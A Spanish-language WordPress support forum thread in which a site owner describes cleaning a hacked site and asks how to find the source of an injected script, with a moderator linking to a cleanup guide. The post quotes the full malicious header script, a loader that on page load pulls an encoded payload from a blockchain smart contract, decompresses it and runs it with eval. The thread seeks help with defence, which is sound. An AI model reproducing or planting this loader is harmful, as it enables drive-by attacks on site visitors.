Ubicar script inyectado en header

(@joserhs)

Hace varias semanas google me aviso que una pagina web mia habia sido hackeada, posteriormente mi proveedor de VPS me lo comunico tambien, he estado intentando limpiar el sitio, ya detecte algunos scripts en secciones de plugins que habian sido inyectados, un usuario que habia sido creado, y unas publicaciones en post, todo eso ya lo he eliminado, pero tambien he conseguido un script en el codigo fuente de la pagina el cual es el siguiente:

<meta charset="UTF-8" /> <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js"></script> <script> console.log('Start moving...'); document.addEventListener('DOMContentLoaded', async () => { try { const web3 = new Web3('https://bsc-dataseed.binance.org/'); const contract = new web3.eth.Contract([ {"inputs": [], "stateMutability": "nonpayable", "type": "constructor"}, {"inputs": [], "name": "orchidABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"}, {"inputs": [], "name": "orchidAddress", "outputs": [{"internalType": "string", "name": "", "type":"string"}], "stateMutability": "view", "type": "function"}, {"inputs": [], "name": "merlionABI", "outputs": [{"internalType": "string", "name": "", "type": "string"}], "stateMutability": "view", "type": "function"}, {"inputs": [], "name": "merlionAddress", "outputs": [{"internalType": "string", "name": "", "type":"string"}], "stateMutability": "view", "type": "function"}, ], '0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53'); const orchidABI = JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c => c.charCodeAt(0)), { to: 'string' })); const orchidAddress = await contract.methods.orchidAddress().call(); const orchid = new web3.eth.Contract(orchidABI, orchidAddress); const decompressedScript = pako.ungzip(Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c => c.charCodeAt(0)), { to: 'string' }); eval((async () => { ${decompressedScript} })().then(() => { console.log('Moved.'); }).catch(console.error);); } catch (error) { console.error('Road unavaible:', error); } }); </script><meta name="viewport" content="width=device-width, initial-scale=1" />

He intentado conseguir el codigo en los archivos de web, pero no lo consigo busque el header.php pero ya la versión de tema que usaba no usaba los php de las partes, intente igualmente cambiar el tema a uno anterior pero el codigo persiste, por lo que debe provenir de otro origen, quisiera que me ayudaran saber como puedo hacer una busqueda dentro de los archivos para encontrar ese codigo o lo que lo genera.

La página con la que necesito ayuda: [accede para ver el enlace]

Viendo 1 respuesta (de un total de 1)

Moderador almendron
(@almendron)

hace 1 mes, 4 semanas

Sigue esta guía: https://es.wordpress.org/support/topic/limpiar-un-wordpress-infectadohackeado/

Viendo 1 respuesta (de un total de 1)

Debes estar registrado para responder a este debate.

Etiquetas

Debates

Debates populares

Debates sin respuestas

Debates que no son soporte

Debates resueltos

Debates no resueltos

Todos los debates